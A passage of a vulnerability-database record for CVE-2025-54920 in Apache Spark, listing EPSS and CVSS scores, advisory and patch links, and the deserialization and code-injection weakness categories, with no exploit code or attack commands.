scoring_system epss
scoring_elements 0.65871
published_at 2026-04-04T12:55:00Z
3
value 0.00674
scoring_system epss
scoring_elements 0.71392
published_at 2026-04-08T12:55:00Z
4
value 0.00674
scoring_system epss
scoring_elements 0.71428
published_at 2026-04-11T12:55:00Z
5
value 0.00674
scoring_system epss
scoring_elements 0.71405
published_at 2026-04-09T12:55:00Z
6
value 0.00674
scoring_system epss
scoring_elements 0.71412
published_at 2026-04-12T12:55:00Z
7
value 0.00674
scoring_system epss
scoring_elements 0.71395
published_at 2026-04-13T12:55:00Z
8
value 0.00718
scoring_system epss
scoring_elements 0.7248
published_at 2026-04-16T12:55:00Z
9
value 0.00718
scoring_system epss
scoring_elements 0.72489
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-54920
2
reference_url https://github.com/apache/spark
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/apache/spark
3
reference_url https://github.com/apache/spark/pull/51312
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://github.com/apache/spark/pull/51312
4
reference_url https://github.com/apache/spark/pull/51323
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://github.com/apache/spark/pull/51323
5
reference_url https://issues.apache.org/jira/browse/SPARK-52381
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://issues.apache.org/jira/browse/SPARK-52381
6
reference_url https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/
url https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-54920
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-54920
8
reference_url http://www.openwall.com/lists/oss-security/2026/03/13/4
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2026/03/13/4
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2447599
reference_id 2447599
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2447599
10
reference_url https://github.com/advisories/GHSA-jwp6-cvj8-fw65
reference_id GHSA-jwp6-cvj8-fw65
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jwp6-cvj8-fw65
Weaknesses
0
cwe_id 502
name Deserialization of Untrusted Data
description The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid.
1
cwe_id 94
name Improper Control of Generation of Code ('Code Injection')
description The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
2
cwe_id 937
name OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.
3
cwe_id 1035
name OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.
Exploits
Severity_range_score6.7 - 8.9
Exploitability0.5
Weighted_severity8.0
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/vulnerabilities/VCID-1gtx-thb1-9ud6